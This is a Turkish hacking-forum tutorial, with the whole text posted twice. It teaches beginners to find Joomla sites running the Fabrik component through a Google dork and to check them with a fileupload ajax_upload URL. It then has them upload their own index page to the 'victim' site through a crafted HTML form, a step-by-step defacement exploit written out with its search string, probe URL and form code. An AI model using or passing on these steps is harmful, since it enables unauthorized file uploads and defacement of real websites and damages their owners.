Öncelik herkese selamlar dostlar,
Bu konuyu Dork kullanımı konusunda yeni yeni bir şeyler öğrenmeye başlamış kardeşlerimiz için örnek olsun diye anlatma gereği duydum. Öncelikle bu işte her yöntemde olduğu gibi Dork kısmı özellikte tam anlamıyla sabır işidir.
Dork kullanımı; Siteler üzerinde ki belli açıkları belli Google aramalarıyla listelenen kurbanlara saldırdığımız yöntemdir. Yüzlerce çeşit dork bulunmaktadır ve şimdi daha iyi anlayabilmeniz için uygulamalı bir şeyler deneyelim.
Başlayalım !
Öncelikle benim kullanacağım Dork: inurl:index.php/component/fabrik/
Bu Dork'u olduğu gibi kopyalayıp Google üzerinde aratın.
Çıkan sonuçların her birini yeni sekmelerde açın.
açılan sayfaların adres çubuğunda /index.php kısmı dahil linkin sonrasını silin. Yani sadece domain adı yazsın.
Sildikten hemen sonra yerine aşağıdaki kodu yapıştırıp ilerleyin.
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Bu link yapısını yapıştırıp ilerledikten sonra; açılan sayfada ki sonuç böyle bir hataysa eğer;
{"filepath":null,"uri":null}
O siteye Dork yöntemi ile başarılı bir şekilde giriş yapabileceğiniz anlamına geliyor.
Ardından CSRF yöntemi ile indeximizi upload edeceğiz. Bir HTML sayfası oluşturup ismini test.html olarak kaydedip içerisinde şu kodları ekleyin ve kaydedin;
<form method="POST" action="https://www.SİTEADI.com/index.php?o...jax_upload/index.php/component/fabrik/form/4/"enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
SİTEADI yazan kısma kurban sitenin adını yazın dosyayı kaydedin ve dosyayı herhangi bir tarayıcıda açın. Açtıktan sonra karşınıza bir upload butonu gelecek. Gelen butona tıklayıp kendi index sayfanızı upload ederek siteadi.com/index.html olarak içeriye dosya atmayı başarmış olacaksınız.
Umarım yeterince açıklayıcı olmuştur, sorusu olan arkadaşlarımızın konunun altına yorum yazması durumunda yardımcı olacağım. Konu anlatımı tamamen özgün olup, tarafıma aittir.
Bu konuyu Dork kullanımı konusunda yeni yeni bir şeyler öğrenmeye başlamış kardeşlerimiz için örnek olsun diye anlatma gereği duydum. Öncelikle bu işte her yöntemde olduğu gibi Dork kısmı özellikte tam anlamıyla sabır işidir.
Dork kullanımı; Siteler üzerinde ki belli açıkları belli Google aramalarıyla listelenen kurbanlara saldırdığımız yöntemdir. Yüzlerce çeşit dork bulunmaktadır ve şimdi daha iyi anlayabilmeniz için uygulamalı bir şeyler deneyelim.
Başlayalım !
Öncelikle benim kullanacağım Dork: inurl:index.php/component/fabrik/
Bu Dork'u olduğu gibi kopyalayıp Google üzerinde aratın.
Çıkan sonuçların her birini yeni sekmelerde açın.
açılan sayfaların adres çubuğunda /index.php kısmı dahil linkin sonrasını silin. Yani sadece domain adı yazsın.
Sildikten hemen sonra yerine aşağıdaki kodu yapıştırıp ilerleyin.
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Bu link yapısını yapıştırıp ilerledikten sonra; açılan sayfada ki sonuç böyle bir hataysa eğer;
{"filepath":null,"uri":null}
O siteye Dork yöntemi ile başarılı bir şekilde giriş yapabileceğiniz anlamına geliyor.
Ardından CSRF yöntemi ile indeximizi upload edeceğiz. Bir HTML sayfası oluşturup ismini test.html olarak kaydedip içerisinde şu kodları ekleyin ve kaydedin;
<form method="POST" action="https://www.SİTEADI.com/index.php?o...jax_upload/index.php/component/fabrik/form/4/"enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
SİTEADI yazan kısma kurban sitenin adını yazın dosyayı kaydedin ve dosyayı herhangi bir tarayıcıda açın. Açtıktan sonra karşınıza bir upload butonu gelecek. Gelen butona tıklayıp kendi index sayfanızı upload ederek siteadi.com/index.html olarak içeriye dosya atmayı başarmış olacaksınız.
Umarım yeterince açıklayıcı olmuştur, sorusu olan arkadaşlarımızın konunun altına yorum yazması durumunda yardımcı olacağım. Konu anlatımı tamamen özgün olup, tarafıma aittir.
